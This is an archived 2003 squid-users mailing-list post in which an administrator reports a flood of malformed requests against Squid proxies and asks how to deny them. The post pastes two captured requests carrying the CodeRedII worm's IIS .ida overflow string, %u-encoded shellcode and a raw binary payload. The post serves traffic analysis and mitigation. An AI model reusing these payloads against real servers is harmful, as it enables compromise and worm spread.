Re: [squid-users] New Code Red?

Hi,

We are seeing a possible new code red. Each victim will flood to a
particular destination. Unlike the original one, this one does not have
send proper HTTP method. Although Squid will return Bad Request, this
attack will consume a lot of resources and bring down the Squid box...

Anybody catches the same thing? It seems to us that DENIED/403
requires less processing than returning NONE/400 or NONE/411. If this it
true, is there anyway to deny these requests?

  GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  X%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u685
  8%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53f
  f%u0078%u0000%u00=a HTTP/1.0..Content-type: text/xml.Conten
  t-length: 3379 ........`........dg.6..dg.&.......h......\...
  P.U...\...P.U..@.....X....U.=.......=..............T....u..~
  0...........F0.........CodeRedII...$.U.f.....8.....P.......j
  ...P...P..8...P.E..p.........8....thS.U..U..E.i.T...,.....,.
  .............F4.E.Pj..u...........j.j..U.P.U.Ou..;...i.T....
  \&....\&.W.U.j.j..U.j..U....F4)E.jd.U...<...P.U....<...=....
  s....>......s.f..p.....f..r....P.d.....t...j.j.j..U....t..E.
  j.Th~f...u..U.Yj...p...P.u..U........tK3..U.=3'..u?..h......
  ...l.........`........E...d.....h...Pj...`...Pj.j..U..j.Th~f
  ...u..U.Y...u1.....X-....j.h....P.u..U.=....u.j.j...\...P.u.
  .U..u..U..........w...........xu......`......d$.dg....Xa..dg
  .6..dg.&..f.;MZu..K<.<.PE..u..T.x...B..<.KERNu..|..EL32u.3.I
  .r ...A..<.GetPu..|..rocAu..J.I...J$........J.......D$$dg...
  .Xa..Q....]..E......LoadLibraryA..u..U..E......CreateThread.
  .u..U..E......GetTickCount..u..U..E......Sleep..u..U..E.....
  .GetSystemDefaultLangID..u..U..E......GetSystemDirectoryA..u
  ..U..E......CopyFileA..u..U..E......GlobalFindAtomA..u..U..E
  ......GlobalAddAtomA

  Squid 2.4S6 reply: HTTP/1.0 411 Length Required.

  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780
  1%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0
  0%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0..Host: xxx.xx.xxx.x
  x..Content-type: text/xml.Content-length: 3379 ..Cache-Contr
  ol: max-stale=0........`........dg.6..dg.&.......h......\...
  P.U...\...P.U..@.....X....U.=.......=..............T....u..~
  0...........F0.........CodeRedII...$.U.f.....8.....P.......j
  ...P...P..8...P.E..p.........8....thS.U..U..E.i.T...,.....,.
  .............F4.E.Pj..u...........j.j..U.P.U.Ou..;...i.T....
  \&....\&.W.U.j.j..U.j..U....F4)E.jd.U...<...P.U....<...=....
  s....>......s.f..p.....f..r....P.d.....t...j.j.j..U....t..E.
  j.Th~f...u..U.Yj...p...P.u..U........tK3..U.=3'..u?..h......
  ...l.........`........E...d.....h...Pj...`...Pj.j..U..j.Th~f
  ...u..U.Y...u1.....X-....j.h....P.u..U.=....u.j.j...\...P.u.
  .U..u..U..........w...........xu......`......d$.dg....Xa..dg
  .6..dg.&..f.;MZu..K<.<.PE..u..T.x...B..<.KERNu..|..EL32u.3.I
  .r ...A..<.GetPu..|..rocAu..J.I...J$........J.......D$$dg...
  .Xa..Q....]..E......LoadLibraryA..u..U..E......CreateThread.
  .u..U..E......GetTickCount..u..U..E......Sleep..u..U..E.....
  .GetSystemDefaultLangID..u..U..E......GetSystemDirectoryA..u
  ..U..E......CopyFileA..u..U..E......GlobalFindAtomA..u..U..E
  ......Global

  Squid 2.4S6 reply: HTTP/1.0 400 Bad Request.

Thanks,
Wei Keong
Received on Thu Apr 03 2003 - 08:56:14 MST